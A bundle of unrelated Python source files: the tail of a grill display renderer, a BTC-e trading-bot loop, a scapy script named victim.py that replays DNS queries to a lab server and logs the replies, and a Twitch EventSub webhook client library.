self.HEIGHT // 2.5 + 22), 5, (255, self.icon_color, 0))
draw = self._rounded_rectangle(draw, (
7 * (self.WIDTH // 8) - 20, self.HEIGHT // 2.5 - 20, 7 * (self.WIDTH // 8) + 20,
self.HEIGHT // 2.5 + 20), 5, (0, 0, 0))
draw.text((7 * (self.WIDTH // 8) - font_width // 2, self.HEIGHT // 2.5 - font_height // 2), text,
font=font, fill=(255, self.icon_color, 0))
if (status_data['outpins']['auger'] == 0):
# A = Auger (Center Left)
self._draw_auger_icon(img)
self.auger_step += 1
if self.auger_step >= 3:
self.auger_step = 0
# Notification Indicator (Right)
show_notify_indicator = False
for item in status_data['notify_req']:
if status_data['notify_req'][item] == True:
show_notify_indicator = True
if (show_notify_indicator == True):
font = ImageFont.truetype("FA-Free-Solid.otf", 36)
text = '\uf0f3'
(font_width, font_height) = font.getsize(text)
draw = self._rounded_rectangle(draw, (
7 * (self.WIDTH // 8) - 22, self.HEIGHT // 6 - 22, 7 * (self.WIDTH // 8) + 22,
self.HEIGHT // 6 + 22),
5, (255, 255, 0))
draw = self._rounded_rectangle(draw, (
7 * (self.WIDTH // 8) - 20, self.HEIGHT // 6 - 20, 7 * (self.WIDTH // 8) + 20,
self.HEIGHT // 6 + 20),
5, (0, 0, 0))
draw.text((7 * (self.WIDTH // 8) - font_width // 2 + 1, self.HEIGHT // 6 - font_height // 2), text,
font=font, fill=(255, 255, 0))
# Smoke Plus Inidicator
if (status_data['s_plus'] == True) and (
(status_data['mode'] == 'Smoke') or (status_data['mode'] == 'Hold')):
draw = self._rounded_rectangle(draw, (
7 * (self.WIDTH // 8) - 22, self.HEIGHT // 2.5 - 22, 7 * (self.WIDTH // 8) + 22,
self.HEIGHT // 2.5 + 22), 5, (150, 0, 255))
draw = self._rounded_rectangle(draw, (
7 * (self.WIDTH // 8) - 20, self.HEIGHT // 2.5 - 20, 7 * (self.WIDTH // 8) + 20,
self.HEIGHT // 2.5 + 20), 5, (0, 0, 0))
font = ImageFont.truetype("FA-Free-Solid.otf", 32)
text = '\uf0c2' # FontAwesome Icon for Cloud (Smoke)
(font_width, font_height) = font.getsize(text)
draw.text((7 * (self.WIDTH // 8) - font_width // 2, self.HEIGHT // 2.5 - font_height // 2), text,
font=font, fill=(100, 0, 255))
font = ImageFont.truetype("FA-Free-Solid.otf", 24)
text = '\uf067' # FontAwesome Icon for PLUS
(font_width, font_height) = font.getsize(text)
draw.text((7 * (self.WIDTH // 8) - font_width // 2, self.HEIGHT // 2.5 - font_height // 2 + 3), text,
font=font, fill=(0, 0, 0))
# Grill Hopper Level (Lower Center)
font = ImageFont.truetype("trebuc.ttf", 16)
text = "Hopper:" + str(status_data['hopper_level']) + "%"
(font_width, font_height) = font.getsize(text)
if (status_data['hopper_level'] > 70):
hopper_color = (0, 255, 0)
elif (status_data['hopper_level'] > 30):
hopper_color = (255, 150, 0)
else:
hopper_color = (255, 0, 0)
draw = self._rounded_rectangle(draw, (
self.WIDTH // 2 - font_width // 2 - 7, 156 - font_height // 2, self.WIDTH // 2 + font_width // 2 + 7,
166 + font_height // 2), 5, hopper_color)
draw = self._rounded_rectangle(draw, (
self.WIDTH // 2 - font_width // 2 - 5, 158 - font_height // 2, self.WIDTH // 2 + font_width // 2 + 5,
164 + font_height // 2), 5, (0, 0, 0))
draw.text((self.WIDTH // 2 - font_width // 2, 160 - font_height // 2), text, font=font, fill=hopper_color)
# Current Mode (Bottom Center)
font = ImageFont.truetype("trebuc.ttf", 36)
text = status_data['mode'] # + ' Mode'
(font_width, font_height) = font.getsize(text)
draw = self._rounded_rectangle(draw, (
self.WIDTH // 2 - font_width // 2 - 7, self.HEIGHT - font_height - 2,
self.WIDTH // 2 + font_width // 2 + 7,
self.HEIGHT - 2), 5, (3, 161, 252))
draw = self._rounded_rectangle(draw, (
self.WIDTH // 2 - font_width // 2 - 5, self.HEIGHT - font_height, self.WIDTH // 2 + font_width // 2 + 5,
self.HEIGHT - 4), 5, (255, 255, 255))
draw.text((self.WIDTH // 2 - font_width // 2, self.HEIGHT - font_height - 6), text, font=font,
fill=(0, 0, 0))
self._display_canvas(img)
'''
================ Externally Available Methods ================
'''
def display_status(self, in_data, status_data):
'''
- Updates the current data for the display loop, if in a work mode
'''
self.units = status_data['units']
self.displayactive = True
self.in_data = in_data
self.status_data = status_data
def display_splash(self):
'''
- Calls Splash Screen
'''
self.displaycommand = 'splash'
def clear_display(self):
'''
- Clear display and turn off backlight
'''
self.displaycommand = 'clear'
def display_text(self, text):
'''
- Display some text
'''
self.displaycommand = 'text'
self.displaydata = text
def display_network(self):
'''
- Display Network IP QR Code
'''
self.displaycommand = 'network'
|
bot.py
|
# Copyright (c) 2013 Alan McIntyre
import datetime
import threading
import time
import traceback
import btceapi
from btceapi.common import validatePair
from trader import TraderBase
def _runBot(bot):
while bot.running:
loop_start = time.time()
# Collect the set of pairs for which we should get depth.
depthPairs = set()
for handler, pairs in bot.depthHandlers:
depthPairs.update(pairs)
# Get current depth
depths = {}
conn = btceapi.BTCEConnection()
for p in depthPairs:
try:
asks, bids = btceapi.getDepth(p, conn)
depths[p] = (datetime.datetime.now(), asks, bids)
except:
bot.onDepthRetrievalError(p, traceback.format_exc())
# Collect the set of pairs for which we should get trade history.
tradeHistoryPairs = set()
for handler, pairs in bot.tradeHistoryHandlers:
tradeHistoryPairs.update(pairs)
tradeHistories = {}
for p in tradeHistoryPairs:
try:
trades = btceapi.getTradeHistory(p, conn)
tradeHistories[p] = (datetime.datetime.now(), trades)
except:
bot.onTradeHistoryRetrievalError(p, traceback.format_exc())
conn.close()
for p, (t, asks, bids) in depths.items():
for handler, pairs in bot.depthHandlers:
if p in pairs:
try:
handler(t, p, asks, bids)
except:
bot.onDepthHandlingError(p, handler, traceback.format_exc())
for p, (t, trades) in tradeHistories.items():
# Merge new trades into the bot's history.
bot.mergeTradeHistory(p, trades)
# Provide full history to traders
for handler, pairs in bot.tradeHistoryHandlers:
if p in pairs:
try:
handler(t, p, bot.tradeHistoryItems[p])
except:
bot.onTradeHistoryHandlingError(p, handler, traceback.format_exc())
# Tell all bots that have requested it that we're at the end
# of an update loop.
for handler in bot.loopEndHandlers:
try:
handler(datetime.datetime.now())
except:
# TODO: refactor this somewhere
t = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
print "%s Error while calling loop end handler (%r): %s" % (t, handler, traceback.format_exc())
while bot.running and time.time() - loop_start < bot.collectionInterval:
time.sleep(0.5)
# Give traders and opportunity to do thread-specific cleanup.
for t in bot.traders:
t.onExit()
class Bot(object):
def __init__(self, bufferSpanMinutes=10):
self.bufferSpanMinutes = bufferSpanMinutes
self.depthHandlers = []
self.tradeHistoryHandlers = []
self.loopEndHandlers = []
self.collectionInterval = 60.0
self.running = False
self.traders = set()
self.tradeHistoryIds = {}
self.tradeHistoryItems = {}
self.errorHandlers = []
def addErrorHandler(self, handler):
'''Add a handler function taking two arguments: a string describing
what operation was in process, and a string containing the
formatted traceback. If an exception is raised inside the handler,
it will be ignored.'''
# TODO: inspect function to make sure it has
# the right number of arguments.
self.errorHandlers.append(handler)
def onDepthRetrievalError(self, pair, tracebackText):
msg = "Error while retrieving %s depth" % pair
for h in self.errorHandlers:
try:
h(msg, tracebackText)
except:
pass
def onDepthHandlingError(self, pair, handler, tracebackText):
msg = "Error in handler %r for %s depth" % (handler, pair)
for h in self.errorHandlers:
try:
h(msg, tracebackText)
except:
pass
def onTradeHistoryRetrievalError(self, pair, tracebackText):
msg = "Error while retrieving %s trade history" % pair
for h in self.errorHandlers:
try:
h(msg, tracebackText)
except:
pass
def onTradeHistoryHandlingError(self, pair, handler, tracebackText):
msg = "Error in handler %r for %s trade history" % (handler, pair)
for h in self.errorHandlers:
try:
h(msg, tracebackText)
except:
pass
def mergeTradeHistory(self, pair, history):
keys = self.tradeHistoryIds.setdefault(pair, set())
prevItems = self.tradeHistoryItems.get(pair, [])
newItems = []
# Remove old items
now = datetime.datetime.now()
dt = datetime.timedelta(minutes = self.bufferSpanMinutes)
for h in prevItems:
if h.date - now > dt:
keys.remove(h.tid)
else:
keys.add(h.tid)
newItems.append(h)
# Add new items
for h in history:
if h.tid not in keys:
keys.add(h.tid)
newItems.append(h)
self.tradeHistoryItems[pair] = newItems
def addTrader(self, trader):
if trader.onNewDepth.__func__ is not TraderBase.onNewDepth.__func__:
self.addDepthHandler(trader.onNewDepth, trader.pairs)
if trader.onNewTradeHistory.__func__ is not TraderBase.onNewTradeHistory.__func__:
self.addTradeHistoryHandler(trader.onNewTradeHistory, trader.pairs)
if trader.onLoopEnd.__func__ is not TraderBase.onLoopEnd.__func__:
self.addLoopEndHandler(trader.onLoopEnd)
self.traders.add(trader)
def addDepthHandler(self, handler, pairs=btceapi.all_pairs):
for p in pairs:
validatePair(p)
self.depthHandlers.append((handler, pairs))
def addTradeHistoryHandler(self, handler, pairs=btceapi.all_pairs):
for p in pairs:
validatePair(p)
self.tradeHistoryHandlers.append((handler, pairs))
def addLoopEndHandler(self, handler):
self.loopEndHandlers.append(handler)
def setCollectionInterval(self, interval_seconds):
self.collectionInterval = interval_seconds
def start(self):
self.running = True
self.thread = threading.Thread(target = _runBot, args=(self,))
self.thread.start()
def stop(self):
self.running = False
self.thread.join()
|
victim.py
|
import argparse
import sys
import socket
import random
import time
import struct
import threading
from scapy.all import *
#from scapy.all import sniff, sendp, send, get_if_list, get_if_hwaddr
#from scapy.all import Packet, IPOption
#from scapy.all import Ether, IP, UDP, TCP, DNS
#from scapy.all import rdpcap
def get_if():
ifs = get_if_list()
iface = None
for i in get_if_list():
if "eth0" in i:
iface = i
break;
if not iface:
print('Cannot find eth0 interface')
exit(1)
return iface
def handle_pkt(pkt):
# print num," got a response"
# print pkt.show()
if UDP in pkt and pkt[UDP].sport == 53:
global num
num = num + 1
if num%10 == 1:
print "Get %4dst packet, id: %5d"%(num,pkt.getlayer(DNS).id)
elif num%10 == 2:
print "Get %4dnd packet, id: %5d"%(num,pkt.getlayer(DNS).id)
elif num%10 == 3:
print "Get %4drd packet, id: %5d"%(num,pkt.getlayer(DNS).id)
else:
print "Get %4dth packet, id: %5d"%(num,pkt.getlayer(DNS).id)
sys.stdout.flush()
def recv_pkt(iface):
try:
sniff(iface = iface, prn = lambda x: handle_pkt(x))
except KeyboardInterrupt:
sys.exit(0)
def main():
#if len(sys.argv)<3:
# print('pass 2 argument: <destination> "<file.pcap>"')
# exit(1)
# addr = socket.gethostbyname("10.0.3.3") # dns_server
addr = "10.0.3.3"
iface = get_if()
print("iface: ", iface)
pcap = rdpcap("dns0313_2_onlyDNS.pcapng")
q_pkt = []
for pkt in pcap:
if pkt.qr == 0: # the packet is query
q_pkt.append(pkt)
recv_th = threading.Thread(target=recv_pkt, args=(iface,))
recv_th.setDaemon(True)
recv_th.start()
try:
N = raw_input()
socket = conf.L2socket(iface=iface)
for i in range(0,int(N)):
a = raw_input()
b = raw_input()
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff')
pkt = pkt /IP(dst=addr) / UDP(dport=53, sport=random.randint(49152,65535)) / q_pkt[int(b)].getlayer(DNS)
sendp(pkt, iface = iface, verbose=False, socket=socket)
if i%10 == 1:
print "Send %4dst packet, id: %5d"%(i,pkt.getlayer(DNS).id)
elif i%10 == 2:
print "Send %4dnd packet, id: %5d"%(i,pkt.getlayer(DNS).id)
elif i%10 == 3:
print "Send %4drd packet, id: %5d"%(i,pkt.getlayer(DNS).id)
else:
print "Send %4dth packet, id: %5d"%(i,pkt.getlayer(DNS).id)
time.sleep(float(a))
while True:
None
except KeyboardInterrupt:
sys.exit(0)
if __name__ == '__main__':
num = 0
main()
|
eventsub.py
|
# Copyright (c) 2021. Lena "Teekeks" During <info@teawork.de>
"""
Full Implementation of the Twitch EventSub
------------------------------------------
The EventSub client runs in its own thread, calling the given callback function whenever an event happens.
Look at the `Twitch EventSub reference <https://dev.twitch.tv/docs/eventsub/eventsub-reference>`__ to find the topics
you are interested in.
************
Requirements
************
You need to have a public IP with a port open. That port will be 80 by default.
You need app authentication and your Endpoint URL must point to a
.. note:: Please note that Your Endpoint URL has to be HTTPS, has to run on Port 443 and requires a valid, non self signed certificate
This most likely means, that you need a reverse proxy like nginx. You can also hand in a valid ssl context to be used in the constructor.
You can check on whether or not your webhook is publicly reachable by navigating to the URL set in `callback_url`.
You should get a 200 response with the text `pyTwitchAPI eventsub`.
*******************
Listening to topics
*******************
After you started your EventSub client, you can use the :code:`listen_` prefixed functions to listen to the topics you are interested in.
The function you hand in as callback will be called whenever that event happens with the event data as a parameter.
*******************
Short code example:
*******************
.. code-block:: python
from pprint import pprint
from twitchAPI import Twitch, EventSub
# this will be called whenever someone follows the target channel
async def on_follow(data: dict):
pprint(data)
TARGET_USERNAME = 'target_username_here'
WEBHOOK_URL = 'https://url.to.your.webhook.com'
APP_ID = 'your_app_id'
APP_SECRET = 'your_app_secret'
twitch = Twitch(APP_ID, APP_SECRET)
twitch.authenticate_app([])
uid = twitch.get_users(logins=[TARGET_USERNAME])
user_id = uid['data'][0]['id']
# basic setup, will run on port 8080 and a reverse proxy takes care of the https and certificate
hook = EventSub(WEBHOOK_URL, APP_ID, 8080, twitch)
# unsubscribe from all to get a clean slate
hook.unsubscribe_all()
# start client
hook.start()
print('subscribing to hooks:')
hook.listen_channel_follow(user_id, on_follow)
try:
input('press Enter to shut down...')
finally:
hook.stop()
print('done')
********************
Class Documentation:
********************
"""
import datetime
import random
import string
import time
from typing import Union, Callable, Optional, Awaitable
from .helper import TWITCH_API_BASE_URL, remove_none_values
from .types import *
import requests
from aiohttp import web
import threading
import asyncio
from logging import getLogger, Logger
from .twitch import Twitch
from concurrent.futures._base import CancelledError
from ssl import SSLContext
from .types import EventSubSubscriptionTimeout, EventSubSubscriptionConflict, EventSubSubscriptionError
import hmac
import hashlib
CALLBACK_TYPE = Callable[[dict], Awaitable[None]]
class EventSub:
"""EventSub integration for the Twitch Helix API.
:param str callback_url: The full URL of the webhook.
:param str api_client_id: The id of your API client
:param int port: the port on which this webhook should run
:param ~ssl.SSLContext ssl_context: optional ssl context to be used |default| :code:`None`
:param ~twitchAPI.twitch.Twitch twitch: a app authenticated instance of :code:`Twitch`
:var str secret: A random secret string. Set this for added security.
:var str callback_url: The full URL of the webhook.
:var bool wait_for_subscription_confirm: Set this to false if you don't want to wait for a subscription confirm.
|default| :code:`True`
:var int wait_for_subscription_confirm_timeout: Max time in seconds to wait for a subscription confirmation.
Only used if ``wait_for_subscription_confirm`` is set to True. |default| :code:`30`
:var bool unsubscribe_on_stop: Unsubscribe all currently active Webhooks on calling `stop()`
|default| :code:`True`
"""
secret = ''.join(random.choice(string.ascii_lowercase) for i in range(20))
callback_url = None
wait_for_subscription_confirm: bool = True
wait_for_subscription_confirm_timeout: int = 30
unsubscribe_on_stop: bool = True
_port: int = 80
_host: str = '0.0.0.0'
__twitch: Twitch = None
__ssl_context = None
__client_id = None
__running = False
__callbacks = {}
__active_webhooks = {}
__hook_thread: Union['threading.Thread', None] = None
__hook_loop: Union['asyncio.AbstractEventLoop', None] = None
__hook_runner: Union['web.AppRunner', None] = None
__logger: Logger = None
def __init__(self,
callback_url: str,
api_client_id: str,
port: int,
twitch: Twitch,
ssl_context: Optional[SSLContext] = None):
self.callback_url = callback_url
self.__client_id = api_client_id
self._port = port
self.__ssl_context = ssl_context
self.__twitch = twitch
self.__logger = getLogger('twitchAPI.eventsub')
if not self.callback_url.startswith('https'):
raise RuntimeError('HTTPS is required for authenticated webhook.\n'
+ 'Either use non authenticated webhook or use a HTTPS proxy!')
def __build_runner(self):
hook_app = web.Application()
hook_app.add_routes([web.post('/callback', self.__handle_callback),
web.get('/', self.__handle_default)])
return web.AppRunner(hook_app)
def __run_hook(self, runner: 'web.AppRunner'):
self.__hook_runner = runner
self.__hook_loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.__hook_loop)
self.__hook_loop.run_until_complete(runner.setup())
site = web.TCPSite(runner, str(self._host), self._port, ssl_context=self.__ssl_context)
self.__hook_loop.run_until_complete(site.start())
self.__logger.info('started twitch API event sub on port ' + str(self._port))
try:
self.__hook_loop.run_forever()
except (CancelledError, asyncio.CancelledError):
self.__logger.debug('we got cancelled')
def start(self):
"""Starts the EventSub client
:rtype: None
:raises RuntimeError: if EventSub is already running
"""
if self.__running:
raise RuntimeError('already started')
self.__hook_thread = threading.Thread(target=self.__run_hook, args=(self.__build_runner(),))
self.__running = True
self.__hook_thread.start()
def stop(self):
"""Stops the EventSub client
This also unsubscribes from all known subscriptions if unsubscribe_on_stop is True
:rtype: None
"""
if self.__hook_runner is not None and self.unsubscribe_on_stop:
self.unsubscribe_all_known()
tasks = {t for t in asyncio.all_tasks(loop=self.__hook_loop) if not t.done()}
for task in tasks:
task.cancel()
self.__hook_loop.call_soon_threadsafe(self.__hook_loop.stop)
self.__hook_runner = None
self.__running = False
# ==================================================================================================================
# HELPER
# ==================================================================================================================
def __build_request_header(self):
token = self.__twitch.get_app_token()
if token is None:
raise TwitchAuthorizationException('no Authorization set!')
return {
'Client-ID': self.__client_id,
'Content-Type': 'application/json',
'Authorization': f'Bearer {token}'
}
def __api_post_request(self, url: str, data: Union[dict, None] = None):
headers = self.__build_request_header()
return requests.post(url, headers=headers, json=data)
def __api_get_request(self, url: str):
headers = self.__build_request_header()
return requests.get(url, headers=headers)
def __api_delete_request(self, url: str):
headers = self.__build_request_header()
return requests.delete(url, headers=headers)
def __add_callback(self, c_id: str, callback):
self.__callbacks[c_id] = {'id': c_id, 'callback': callback, 'active': False}
def __activate_callback(self, c_id: str):
self.__callbacks[c_id]['active'] = True
def _subscribe(self, sub_type: str, sub_version: str, condition: dict, callback) -> str:
""""Subscribe to Twitch Topic"""
self.__logger.debug(f'subscribe to {sub_type} version {sub_version} with condition {condition}')
data = {
'type': sub_type,
'version': sub_version,
'condition': condition,
'transport': {
'method': 'webhook',
'callback': f'{self.callback_url}/callback',
'secret': self.secret
}
}
r_data = self.__api_post_request(TWITCH_API_BASE_URL + 'eventsub/subscriptions', data=data)
result = r_data.json()
error = result.get('error')
if r_data.status_code == 500:
raise TwitchBackendException(error)
if error is not None:
if error.lower() == 'conflict':
raise EventSubSubscriptionConflict(result.get('message', ''))
raise EventSubSubscriptionError(result.get('message'))
sub_id = result['data'][0]['id']
self.__add_callback(sub_id, callback)
if self.wait_for_subscription_confirm:
timeout = datetime.datetime.utcnow() + datetime.timedelta(
seconds=self.wait_for_subscription_confirm_timeout)
while timeout >= datetime.datetime.utcnow():
if self.__callbacks[sub_id]['active']:
return sub_id
time.sleep(0.01)
self.__callbacks.pop(sub_id, None)
raise EventSubSubscriptionTimeout()
return sub_id
async def _verify_signature(self, request: 'web.Request') -> bool:
expected = request.headers['Twitch-Eventsub-Message-Signature']
hmac_message = request.headers['Twitch-Eventsub-Message-Id'] + \
request.headers['Twitch-Eventsub-Message-Timestamp'] + await request.text()
sig = 'sha256=' + hmac.new(bytes(self.secret, 'utf-8'),
msg=bytes(hmac_message, 'utf-8'),
digestmod=hashlib.sha256).hexdigest().lower()
return sig == expected
# ==================================================================================================================
# HANDLERS
# ==================================================================================================================
async def __handle_default(self, request: 'web.Request'):
return web.Response(text="pyTwitchAPI EventSub")
async def __handle_challenge(self, request: 'web.Request', data: dict):
self.__logger.debug(f'received challenge for subscription {data.get("subscription").get("id")}')
if not await self._verify_signature(request):
self.__logger.warning(f'message signature is not matching! Discarding message')
return web.Response(status=403)
self.__activate_callback(data.get('subscription').get('id'))
return web.Response(text=data.get('challenge'))
async def __handle_callback(self, request: 'web.Request'):
data: dict = await request.json()
if data.get('challenge') is not None:
return await self.__handle_challenge(request, data)
sub_id = data.get('subscription', {}).get('id')
callback = self.__callbacks.get(sub_id)
if callback is None:
self.__logger.error(f'received event for unknown subscription with ID {sub_id}')
else:
if not await self._verify_signature(request):
self.__logger.warning(f'message signature is not matching! Discarding message')
return web.Response(status=403)
self.__hook_loop.create_task(callback['callback'](data))
return web.Response(status=200)
def unsubscribe_all(self):
"""Unsubscribe from all subscriptions"""
ids = []
repeat = True
cursor = None
# get all ids
while repeat:
ret = self.__twitch.get_eventsub_subscriptions(after=cursor)
for d in ret.get('data', []):
ids.append(d.get('id'))
cursor = ret.get('pagination', {}).get('cursor')
repeat = cursor is not None
for _id in ids:
succ = self.__twitch.delete_eventsub_subscription(_id)
if not succ:
self.__logger.warning(f'failed to unsubscribe from event {_id}')
self.__callbacks.clear()
def unsubscribe_all_known(self):
"""Unsubscribe from all subscriptions known to this client."""
for key, value in self.__callbacks.items():
self.__logger.debug(f'unsubscribe from event {key}')
succ = self.__twitch.delete_eventsub_subscription(key)
if not succ:
self.__logger.warning(f'failed to unsubscribe from event {key}')
self.__callbacks.clear()
def unsubscribe_topic(self, topic_id: str) -> bool:
"""Unsubscribe from a specific topic."""
result = self.__twitch.delete_eventsub_subscription(topic_id)
if result:
self.__callbacks.pop(topic_id, None)
return result
def listen_channel_update(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A broadcaster updates their channel properties e.g., category, title, mature flag, broadcast, or language.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelupdate
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.update', '1', {'broadcaster_user_id': broadcaster_user_id}, callback)
def listen_channel_follow(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A specified channel receives a follow.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelfollow
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.follow', '1', {'broadcaster_user_id': broadcaster_user_id}, callback)
def listen_channel_subscribe(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A notification when a specified channel receives a subscriber. This does not include resubscribes.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelsubscribe
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.subscribe', '1', {'broadcaster_user_id': broadcaster_user_id}, callback)
def listen_channel_subscription_end(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A notification when a subscription to the specified channel ends.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelsubscriptionend
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.subscription.end', '1', {'broadcaster_user_id': broadcaster_user_id}, callback)
def listen_channel_subscription_gift(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A notification when a viewer gives a gift subscription to one or more users in the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelsubscriptiongift
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.subscription.gift', '1', {'broadcaster_user_id': broadcaster_user_id}, callback)
def listen_channel_subscription_message(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A notification when a user sends a resubscription chat message in a specific channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelsubscriptionmessage
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.subscription.message',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_cheer(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A user cheers on the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelcheer
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.cheer',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_raid(self,
callback: CALLBACK_TYPE,
to_broadcaster_user_id: Optional[str] = None,
from_broadcaster_user_id: Optional[str] = None) -> str:
"""A broadcaster raids another broadcaster’s channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelraid
:param str from_broadcaster_user_id: The broadcaster user ID that created the channel raid you want to get notifications for.
:param str to_broadcaster_user_id: The broadcaster user ID that received the channel raid you want to get notifications for.
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.raid',
'1',
remove_none_values({
'from_broadcaster_user_id': from_broadcaster_user_id,
'to_broadcaster_user_id': to_broadcaster_user_id}),
callback)
def listen_channel_ban(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A viewer is banned from the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelban
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.ban',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_unban(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A viewer is unbanned from the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelunban
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.unban',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
